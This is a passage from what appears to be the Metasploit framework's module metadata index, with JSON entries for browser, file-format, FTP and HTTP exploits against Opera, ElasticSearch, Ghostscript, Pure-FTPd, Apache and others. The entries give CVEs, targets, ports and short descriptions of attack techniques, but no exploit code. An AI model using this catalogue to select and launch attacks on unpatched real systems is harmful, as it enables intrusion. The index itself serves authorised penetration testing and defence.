"type": "exploit",
"author": [
"egypt <egypt@metasploit.com>"
],
"description": "Opera web browser in versions <= 9.10 allows unrestricted script\n access to its configuration page, opera:config, allowing an\n attacker to change settings and potentially execute arbitrary\n code.",
"references": [
"OSVDB-66472"
],
"platform": "Unix",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Opera < 9.10 Unix Cmd"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/opera_configoverwrite.rb",
"is_install_path": true,
"ref_name": "multi/browser/opera_configoverwrite",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/opera_historysearch": {
"name": "Opera historysearch XSS",
"full_name": "exploit/multi/browser/opera_historysearch",
"rank": 600,
"disclosure_date": "2008-10-23",
"type": "exploit",
"author": [
"Roberto Suggi",
"Aviv Raff <avivra@gmail.com>",
"egypt <egypt@metasploit.com>"
],
"description": "Certain constructs are not escaped correctly by Opera's History\n Search results. These can be used to inject scripts into the\n page, which can then be used to modify configuration settings\n and execute arbitrary commands. Affects Opera versions between\n 9.50 and 9.61.",
"references": [
"CVE-2008-4696",
"OSVDB-49472",
"BID-31869",
"URL-http://www.opera.com/support/kb/view/903/"
],
"platform": "Unix",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Opera < 9.61 Unix Cmd"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/opera_historysearch.rb",
"is_install_path": true,
"ref_name": "multi/browser/opera_historysearch",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/qtjava_pointer": {
"name": "Apple QTJava toQTPointer() Arbitrary Memory Access",
"full_name": "exploit/multi/browser/qtjava_pointer",
"rank": 600,
"disclosure_date": "2007-04-23",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"kf <kf_list@digitalmunition.com>",
"ddz <ddz@theta44.org>"
],
"description": "This module exploits an arbitrary memory access vulnerability in the\n Quicktime for Java API provided with Quicktime 7.",
"references": [
"CVE-2007-2175",
"OSVDB-34178",
"BID-23608",
"ZDI-07-023"
],
"platform": "OSX,Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Quicktime 7 on Windows x86",
"Quicktime 7 on Mac OS X PPC",
"Quicktime 7 on Mac OS X x86"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/qtjava_pointer.rb",
"is_install_path": true,
"ref_name": "multi/browser/qtjava_pointer",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/elasticsearch/script_mvel_rce": {
"name": "ElasticSearch Dynamic Script Arbitrary Java Execution",
"full_name": "exploit/multi/elasticsearch/script_mvel_rce",
"rank": 600,
"disclosure_date": "2013-12-09",
"type": "exploit",
"author": [
"Alex Brasetvik",
"Bouke van der Bijl",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a remote command execution (RCE) vulnerability in ElasticSearch,\n exploitable by default on ElasticSearch prior to 1.2.0. The bug is found in the\n REST API, which does not require authentication, where the search\n function allows dynamic scripts execution. It can be used by remote attackers\n to execute arbitrary Java code. This module has been tested successfully on\n ElasticSearch 1.1.1 on Ubuntu Server 12.04 and Windows XP SP3.",
"references": [
"CVE-2014-3120",
"OSVDB-106949",
"EDB-33370",
"URL-http://bouk.co/blog/elasticsearch-rce/",
"URL-https://www.found.no/foundation/elasticsearch-security/#staying-safe-while-developing-with-elasticsearch"
],
"platform": "Java",
"arch": "java",
"rport": 9200,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"ElasticSearch 1.1.1 / Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/elasticsearch/script_mvel_rce.rb",
"is_install_path": true,
"ref_name": "multi/elasticsearch/script_mvel_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/elasticsearch/search_groovy_script": {
"name": "ElasticSearch Search Groovy Sandbox Bypass",
"full_name": "exploit/multi/elasticsearch/search_groovy_script",
"rank": 600,
"disclosure_date": "2015-02-11",
"type": "exploit",
"author": [
"Cameron Morris",
"Darren Martyn",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a remote command execution (RCE) vulnerability in ElasticSearch,\n exploitable by default on ElasticSearch prior to 1.4.3. The bug is found in the\n REST API, which does not require authentication, where the search function allows\n groovy code execution and its sandbox can be bypassed using java.lang.Math.class.forName\n to reference arbitrary classes. It can be used to execute arbitrary Java code. This\n module has been tested successfully on ElasticSearch 1.4.2 on Ubuntu Server 12.04.",
"references": [
"CVE-2015-1427",
"URL-https://jordan-wright.github.io/blog/2015/03/08/elasticsearch-rce-vulnerability-cve-2015-1427/",
"URL-https://github.com/XiphosResearch/exploits/tree/master/ElasticSearch",
"URL-http://drops.wooyun.org/papers/5107"
],
"platform": "Java",
"arch": "java",
"rport": 9200,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"ElasticSearch 1.4.2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/elasticsearch/search_groovy_script.rb",
"is_install_path": true,
"ref_name": "multi/elasticsearch/search_groovy_script",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/fileformat/adobe_u3d_meshcont": {
"name": "Adobe U3D CLODProgressiveMeshDeclaration Array Overrun",
"full_name": "exploit/multi/fileformat/adobe_u3d_meshcont",
"rank": 400,
"disclosure_date": "2009-10-13",
"type": "exploit",
"author": [
"Felipe Andres Manzano <felipe.andres.manzano@gmail.com>",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits an array overflow in Adobe Reader and Adobe Acrobat.\n Affected versions include < 7.1.4, < 8.1.7, and < 9.2. By creating a\n specially crafted pdf that contains malformed U3D data, an attacker may\n be able to execute arbitrary code.",
"references": [
"CVE-2009-2990",
"OSVDB-58920",
"BID-36665",
"URL-http://sites.google.com/site/felipeandresmanzano/",
"URL-http://www.adobe.com/support/security/bulletins/apsb09-15.html"
],
"platform": "Linux,Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Adobe Reader Windows Universal (JS Heap Spray)",
"Adobe Reader Linux Universal (JS Heap Spray)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/fileformat/adobe_u3d_meshcont.rb",
"is_install_path": true,
"ref_name": "multi/fileformat/adobe_u3d_meshcont",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/fileformat/evince_cbt_cmd_injection": {
"name": "Evince CBT File Command Injection",
"full_name": "exploit/multi/fileformat/evince_cbt_cmd_injection",
"rank": 600,
"disclosure_date": "2017-07-13",
"type": "exploit",
"author": [
"Felix Wilhelm",
"Sebastian Krahmer",
"Matlink",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a command injection vulnerability in Evince\n before version 3.24.1 when opening comic book `.cbt` files.\n\n Some file manager software, such as Nautilus and Atril, may allow\n automatic exploitation without user interaction due to thumbnailer\n preview functionality.\n\n Note that limited space is available for the payload (<256 bytes).\n Reverse Bash and Reverse Netcat payloads should be sufficiently small.\n\n This module has been tested successfully on evince versions:\n\n 3.4.0-3.1 + nautilus 3.4.2-1+build1 on Kali 1.0.6;\n 3.18.2-1ubuntu4.3 + atril 1.12.2-1ubuntu0.3 on Ubuntu 16.04.",
"references": [
"BID-99597",
"CVE-2017-1000083",
"EDB-45824",
"URL-https://seclists.org/oss-sec/2017/q3/128",
"URL-https://bugzilla.gnome.org/show_bug.cgi?id=784630",
"URL-https://bugzilla.suse.com/show_bug.cgi?id=1046856",
"URL-https://bugs.launchpad.net/ubuntu/+source/atril/+bug/1735418",
"URL-https://bugs.launchpad.net/ubuntu/+source/atril/+bug/1800662",
"URL-https://access.redhat.com/security/cve/cve-2017-1000083",
"URL-https://security-tracker.debian.org/tracker/CVE-2017-1000083"
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2019-02-03 06:18:31 +0000",
"path": "/modules/exploits/multi/fileformat/evince_cbt_cmd_injection.rb",
"is_install_path": true,
"ref_name": "multi/fileformat/evince_cbt_cmd_injection",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/fileformat/ghostscript_failed_restore": {
"name": "Ghostscript Failed Restore Command Execution",
"full_name": "exploit/multi/fileformat/ghostscript_failed_restore",
"rank": 600,
"disclosure_date": "2018-08-21",
"type": "exploit",
"author": [
"Tavis Ormandy",
"wvu <wvu@metasploit.com>"
],
"description": "This module exploits a -dSAFER bypass in Ghostscript to execute\n arbitrary commands by handling a failed restore (grestore) in\n PostScript to disable LockSafetyParams and avoid invalidaccess.\n\n This vulnerability is reachable via libraries such as ImageMagick.",
"references": [
"CVE-2018-16509",
"URL-https://seclists.org/oss-sec/2018/q3/142",
"URL-https://bugs.chromium.org/p/project-zero/issues/detail?id=1640"
],
"platform": "Linux,Unix,Windows",
"arch": "cmd, x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Unix (In-Memory)",
"PowerShell (In-Memory)",
"Linux (Dropper)"
],
"mod_time": "2019-04-24 11:34:42 +0000",
"path": "/modules/exploits/multi/fileformat/ghostscript_failed_restore.rb",
"is_install_path": true,
"ref_name": "multi/fileformat/ghostscript_failed_restore",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"RelatedModules": [
"exploit/unix/fileformat/ghostscript_type_confusion",
"exploit/unix/fileformat/imagemagick_delegate"
]
}
},
"exploit_multi/fileformat/js_unpacker_eval_injection": {
"name": "Javascript Injection for Eval-based Unpackers",
"full_name": "exploit/multi/fileformat/js_unpacker_eval_injection",
"rank": 600,
"disclosure_date": "2015-02-18",
"type": "exploit",
"author": [
"joev <joev@metasploit.com>"
],
"description": "This module generates a Javascript file that executes arbitrary code\n when an eval-based unpacker is run on it. Works against js-beautify's\n P_A_C_K_E_R unpacker.",
"references": [
],
"platform": "NodeJS",
"arch": "nodejs",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/fileformat/js_unpacker_eval_injection.rb",
"is_install_path": true,
"ref_name": "multi/fileformat/js_unpacker_eval_injection",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/fileformat/libreoffice_macro_exec": {
"name": "LibreOffice Macro Code Execution",
"full_name": "exploit/multi/fileformat/libreoffice_macro_exec",
"rank": 300,
"disclosure_date": "2018-10-18",
"type": "exploit",
"author": [
"Alex Inführ",
"Shelby Pace"
],
"description": "LibreOffice comes bundled with sample macros written in Python and\n allows the ability to bind program events to them. A macro can be tied\n to a program event by including the script that contains the macro and\n the function name to be executed. Additionally, a directory traversal\n vulnerability exists in the component that references the Python script\n to be executed. This allows a program event to execute functions from Python\n scripts relative to the path of the sample macros folder. The pydoc.py script\n included with LibreOffice contains the tempfilepager function that passes\n arguments to os.system, allowing RCE.\n\n This module generates an ODT file with a mouse over event that\n when triggered, will execute arbitrary code.",
"references": [
"CVE-2018-16858",
"URL-https://insert-script.blogspot.com/2019/02/libreoffice-cve-2018-16858-remote-code.html"
],
"platform": "Linux,Windows",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows",
"Linux"
],
"mod_time": "2019-04-17 08:29:58 +0000",
"path": "/modules/exploits/multi/fileformat/libreoffice_macro_exec.rb",
"is_install_path": true,
"ref_name": "multi/fileformat/libreoffice_macro_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/fileformat/maple_maplet": {
"name": "Maple Maplet File Creation and Command Execution",
"full_name": "exploit/multi/fileformat/maple_maplet",
"rank": 600,
"disclosure_date": "2010-04-26",
"type": "exploit",
"author": [
"scriptjunkie"
],
"description": "This module harnesses Maple's ability to create files and execute commands\n automatically when opening a Maplet. All versions up to 13 are suspected\n vulnerable. Testing was conducted with version 13 on Windows. Standard security\n settings prevent code from running in a normal maple worksheet without user\n interaction, but those settings do not prevent code in a Maplet from running.\n\n In order for the payload to be executed, an attacker must convince someone to\n open a specially modified .maplet file with Maple. By doing so, an attacker can\n execute arbitrary code as the victim user.",
"references": [
"OSVDB-64541",
"URL-http://www.maplesoft.com/products/maple/"
],
"platform": "Linux,Unix,Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows",
"Windows X64",
"Linux",
"Linux X64",
"Universal CMD"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/fileformat/maple_maplet.rb",
"is_install_path": true,
"ref_name": "multi/fileformat/maple_maplet",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/fileformat/nodejs_js_yaml_load_code_exec": {
"name": "Nodejs js-yaml load() Code Execution",
"full_name": "exploit/multi/fileformat/nodejs_js_yaml_load_code_exec",
"rank": 600,
"disclosure_date": "2013-06-28",
"type": "exploit",
"author": [
"Neal Poole",
"joev <joev@metasploit.com>"
],
"description": "This module can be used to abuse node.js applications that parse user-supplied YAML input\n using the load() function from the 'js-yaml' package < 2.0.5, which doesn't properly handle\n the unsafe !!js/function tag, allowing to specify a self-executing function which results\n in execution of arbitrary javascript code.",
"references": [
"CVE-2013-4660",
"OSVDB-94656",
"BID-60867",
"URL-https://nealpoole.com/blog/2013/06/code-execution-via-yaml-in-js-yaml-nodejs-module/"
],
"platform": "NodeJS",
"arch": "nodejs",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/fileformat/nodejs_js_yaml_load_code_exec.rb",
"is_install_path": true,
"ref_name": "multi/fileformat/nodejs_js_yaml_load_code_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/fileformat/office_word_macro": {
"name": "Microsoft Office Word Malicious Macro Execution",
"full_name": "exploit/multi/fileformat/office_word_macro",
"rank": 600,
"disclosure_date": "2012-01-10",
"type": "exploit",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module injects a malicious macro into a Microsoft Office Word document (docx). The\n comments field in the metadata is injected with a Base64 encoded payload, which will be\n decoded by the macro and execute as a Windows executable.\n\n For a successful attack, the victim is required to manually enable macro execution.",
"references": [
"URL-https://en.wikipedia.org/wiki/Macro_virus"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Microsoft Office Word on Windows",
"Microsoft Office Word on Mac OS X (Python)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/fileformat/office_word_macro.rb",
"is_install_path": true,
"ref_name": "multi/fileformat/office_word_macro",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/fileformat/peazip_command_injection": {
"name": "PeaZip Zip Processing Command Injection",
"full_name": "exploit/multi/fileformat/peazip_command_injection",
"rank": 600,
"disclosure_date": "2009-06-05",
"type": "exploit",
"author": [
"pyrokinesis",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a command injection vulnerability in PeaZip. All\n versions prior to 2.6.2 are suspected vulnerable. Testing was conducted with\n version 2.6.1 on Windows.\n\n In order for the command to be executed, an attacker must convince someone to\n open a specially crafted zip file with PeaZip, and access the specially crafted file via\n double-clicking it. By doing so, an attacker can execute arbitrary commands\n as the victim user.",
"references": [
"CVE-2009-2261",
"OSVDB-54966",
"URL-http://peazip.sourceforge.net/",
"EDB-8881"
],
"platform": "Linux,Unix,Windows",
"arch": "cmd",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/fileformat/peazip_command_injection.rb",
"is_install_path": true,
"ref_name": "multi/fileformat/peazip_command_injection",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/fileformat/swagger_param_inject": {
"name": "JSON Swagger CodeGen Parameter Injector",
"full_name": "exploit/multi/fileformat/swagger_param_inject",
"rank": 600,
"disclosure_date": "2016-06-23",
"type": "exploit",
"author": [
"ethersnowman <scott_davis@rapid7.com>"
],
"description": "This module generates an Open API Specification 2.0 (Swagger) compliant\n json document that includes payload insertion points in parameters.\n\n In order for the payload to be executed, an attacker must convince\n someone to generate code from a specially modified swagger.json file\n within a vulnerable swagger-codegen appliance/container/api/service,\n and then to execute that generated code (or include it into software\n which will later be executed by another victim). By doing so, an\n attacker can execute arbitrary code as the victim user. The same\n vulnerability exists in the YAML format.",
"references": [
"CVE-2016-5641",
"URL-http://github.com/swagger-api/swagger-codegen",
"URL-https://community.rapid7.com/community/infosec/blog/2016/06/23/r7-2016-06-remote-code-execution-via-swagger-parameter-injection-cve-2016-5641"
],
"platform": "Java,NodeJS,PHP,Ruby",
"arch": "nodejs, php, java, ruby",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"NodeJS",
"PHP",
"Java JSP",
"Ruby"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/multi/fileformat/swagger_param_inject.rb",
"is_install_path": true,
"ref_name": "multi/fileformat/swagger_param_inject",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/ftp/pureftpd_bash_env_exec": {
"name": "Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)",
"full_name": "exploit/multi/ftp/pureftpd_bash_env_exec",
"rank": 600,
"disclosure_date": "2014-09-24",
"type": "exploit",
"author": [
"Stephane Chazelas",
"Frank Denis",
"Spencer McIntyre"
],
"description": "This module exploits the Shellshock vulnerability, a flaw in how the Bash shell\n handles external environment variables. This module targets the Pure-FTPd FTP\n server when it has been compiled with the --with-extauth flag and an external\n Bash script is used for authentication. If the server is not set up this way,\n the exploit will fail, even if the version of Bash in use is vulnerable.",
"references": [
"CVE-2014-6271",
"CWE-94",
"OSVDB-112004",
"EDB-34765",
"URL-https://gist.github.com/jedisct1/88c62ee34e6fa92c31dc",
"URL-http://download.pureftpd.org/pub/pure-ftpd/doc/README.Authentication-Modules"
],
"platform": "",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Linux x86",
"Linux x86_64"
],
"mod_time": "2018-10-27 20:54:14 +0000",
"path": "/modules/exploits/multi/ftp/pureftpd_bash_env_exec.rb",
"is_install_path": true,
"ref_name": "multi/ftp/pureftpd_bash_env_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"Shellshock"
],
"Stability": [
"crash-safe"
],
"SideEffects": [
"artifacts-on-disk",
"ioc-in-logs"
],
"Reliability": [
"repeatable-session"
]
}
},
"exploit_multi/ftp/wuftpd_site_exec_format": {
"name": "WU-FTPD SITE EXEC/INDEX Format String Vulnerability",
"full_name": "exploit/multi/ftp/wuftpd_site_exec_format",
"rank": 500,
"disclosure_date": "2000-06-22",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a format string vulnerability in versions of the\n Washington University FTP server older than 2.6.1. By executing\n specially crafted SITE EXEC or SITE INDEX commands containing format\n specifiers, an attacker can corrupt memory and execute arbitrary code.",
"references": [
"CVE-2000-0573",
"OSVDB-11805",
"BID-1387"
],
"platform": "Linux",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Automatic Targeting",
"Slackware 2.1 (Version wu-2.4(1) Sun Jul 31 21:15:56 CDT 1994)",
"RedHat 6.2 (Version wu-2.6.0(1) Mon Feb 28 10:30:36 EST 2000)",
"Debug"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/ftp/wuftpd_site_exec_format.rb",
"is_install_path": true,
"ref_name": "multi/ftp/wuftpd_site_exec_format",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/gdb/gdb_server_exec": {
"name": "GDB Server Remote Payload Execution",
"full_name": "exploit/multi/gdb/gdb_server_exec",
"rank": 500,
"disclosure_date": "2014-08-24",
"type": "exploit",
"author": [
"joev <joev@metasploit.com>"
],
"description": "This module attempts to execute an arbitrary payload on a loose gdbserver service.",
"references": [
"URL-https://github.com/rapid7/metasploit-framework/pull/3691"
],
"platform": "Linux,OSX,Unix",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"x86 (32-bit)",
"x86_64 (64-bit)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/gdb/gdb_server_exec.rb",
"is_install_path": true,
"ref_name": "multi/gdb/gdb_server_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/hams/steamed": {
"name": "Steamed Hams",
"full_name": "exploit/multi/hams/steamed",
"rank": 0,
"disclosure_date": "2018-04-01",
"type": "exploit",
"author": [
"bcook-r7"
],
"description": "but it's a Metasploit Module",
"references": [
"URL-https://www.youtube.com/watch?v=mkX3dO6KN54"
],
"platform": "Android,Apple_iOS,BSD,Java,JavaScript,Linux,Mainframe,Multi,NodeJS,OSX,PHP,Python,Ruby,Solaris,Unix,Windows",
"arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"An Unforgettable Luncheon",
"Legitimate Theater"
],
"mod_time": "2018-05-24 11:01:26 +0000",
"path": "/modules/exploits/multi/hams/steamed.rb",
"is_install_path": true,
"ref_name": "multi/hams/steamed",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/handler": {
"name": "Generic Payload Handler",
"full_name": "exploit/multi/handler",
"rank": 0,
"disclosure_date": null,
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"bcook-r7"
],
"description": "This module is a stub that provides all of the\n features of the Metasploit payload system to exploits\n that have been launched outside of the framework.",
"references": [
],
"platform": "Android,Apple_iOS,BSD,Java,JavaScript,Linux,Mainframe,Multi,NodeJS,OSX,PHP,Python,Ruby,Solaris,Unix,Windows",
"arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Wildcard Target"
],
"mod_time": "2018-02-27 04:30:09 +0000",
"path": "/modules/exploits/multi/handler.rb",
"is_install_path": true,
"ref_name": "multi/handler",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/activecollab_chat": {
"name": "Active Collab \"chat module\" Remote PHP Code Injection Exploit",
"full_name": "exploit/multi/http/activecollab_chat",
"rank": 600,
"disclosure_date": "2012-05-30",
"type": "exploit",
"author": [
"mr_me <steventhomasseeley@gmail.com>"
],
"description": "This module exploits an arbitrary code injection vulnerability in the\n chat module that is part of Active Collab versions 2.3.8 and earlier by\n abusing a preg_replace() using the /e modifier and its replacement\n string using double quotes. The vulnerable function can be found in\n activecollab/application/modules/chat/functions/html_to_text.php.",
"references": [
"CVE-2012-6554",
"OSVDB-81966",
"URL-http://www.activecollab.com/downloads/category/4/package/62/releases"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/activecollab_chat.rb",
"is_install_path": true,
"ref_name": "multi/http/activecollab_chat",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/ajaxplorer_checkinstall_exec": {
"name": "AjaXplorer checkInstall.php Remote Command Execution",
"full_name": "exploit/multi/http/ajaxplorer_checkinstall_exec",
"rank": 600,
"disclosure_date": "2010-04-04",
"type": "exploit",
"author": [
"Julien Cayssol",
"David Maciejak",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits an arbitrary command execution vulnerability in the\n AjaXplorer 'checkInstall.php' script. All versions of AjaXplorer prior to\n 2.6 are vulnerable.",
"references": [
"OSVDB-63552",
"BID-39334"
],
"platform": "BSD,Linux,OSX,Unix,Windows",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"AjaXplorer 2.5.5 or older"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/ajaxplorer_checkinstall_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/apache_activemq_upload_jsp": {
"name": "ActiveMQ web shell upload",
"full_name": "exploit/multi/http/apache_activemq_upload_jsp",
"rank": 600,
"disclosure_date": "2016-06-01",
"type": "exploit",
"author": [
"Ian Anderson <andrsn84@gmail.com>",
"Hillary Benson <1n7r1gu3@gmail.com>"
],
"description": "The Fileserver web application in Apache ActiveMQ 5.x before 5.14.0\n allows remote attackers to upload and execute arbitrary files via an\n HTTP PUT followed by an HTTP MOVE request.",
"references": [
"CVE-2016-3088",
"URL-http://activemq.apache.org/security-advisories.data/CVE-2016-3088-announcement.txt"
],
"platform": "Java,Linux,Windows",
"arch": "",
"rport": 8161,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Java Universal",
"Linux",
"Windows"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/apache_activemq_upload_jsp.rb",
"is_install_path": true,
"ref_name": "multi/http/apache_activemq_upload_jsp",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/apache_jetspeed_file_upload": {
"name": "Apache Jetspeed Arbitrary File Upload",
"full_name": "exploit/multi/http/apache_jetspeed_file_upload",
"rank": 0,
"disclosure_date": "2016-03-06",
"type": "exploit",
"author": [
"Andreas Lindh",
"wvu <wvu@metasploit.com>"
],
"description": "This module exploits the unsecured User Manager REST API and a ZIP file\n path traversal in Apache Jetspeed-2, version 2.3.0 and unknown earlier\n versions, to upload and execute a shell.\n\n Note: this exploit will create, use, and then delete a new admin user.\n\n Warning: in testing, exploiting the file upload clobbered the web\n interface beyond repair. No workaround has been found yet. Use this\n module at your own risk. No check will be implemented.",
"references": [
"CVE-2016-0710",
"CVE-2016-0709",
"URL-http://haxx.ml/post/140552592371/remote-code-execution-in-apache-jetspeed-230-and",
"URL-https://portals.apache.org/jetspeed-2/security-reports.html#CVE-2016-0709",
"URL-https://portals.apache.org/jetspeed-2/security-reports.html#CVE-2016-0710"
],
"platform": "Linux,Windows",
"arch": "java",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Apache Jetspeed <= 2.3.0 (Linux)",
"Apache Jetspeed <= 2.3.0 (Windows)"
],
"mod_time": "2019-02-25 11:32:06 +0000",
"path": "/modules/exploits/multi/http/apache_jetspeed_file_upload.rb",
"is_install_path": true,
"ref_name": "multi/http/apache_jetspeed_file_upload",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/apache_mod_cgi_bash_env_exec": {
"name": "Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)",
"full_name": "exploit/multi/http/apache_mod_cgi_bash_env_exec",
"rank": 600,
"disclosure_date": "2014-09-24",
"type": "exploit",
"author": [
"Stephane Chazelas",
"wvu <wvu@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>",
"lcamtuf"
],
"description": "This module exploits the Shellshock vulnerability, a flaw in how the Bash shell\n handles external environment variables. This module targets CGI scripts in the\n Apache web server by setting the HTTP_USER_AGENT environment variable to a\n malicious function definition.",
"references": [
"CVE-2014-6271",
"CVE-2014-6278",
"CWE-94",
"OSVDB-112004",
"EDB-34765",
"URL-https://access.redhat.com/articles/1200223",
"URL-https://seclists.org/oss-sec/2014/q3/649"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Linux x86",
"Linux x86_64"
],
"mod_time": "2018-11-16 12:18:28 +0000",
"path": "/modules/exploits/multi/http/apache_mod_cgi_bash_env_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/apache_mod_cgi_bash_env_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"Shellshock"
]
}
},
"exploit_multi/http/apache_roller_ognl_injection": {
"name": "Apache Roller OGNL Injection",
"full_name": "exploit/multi/http/apache_roller_ognl_injection",
"rank": 600,
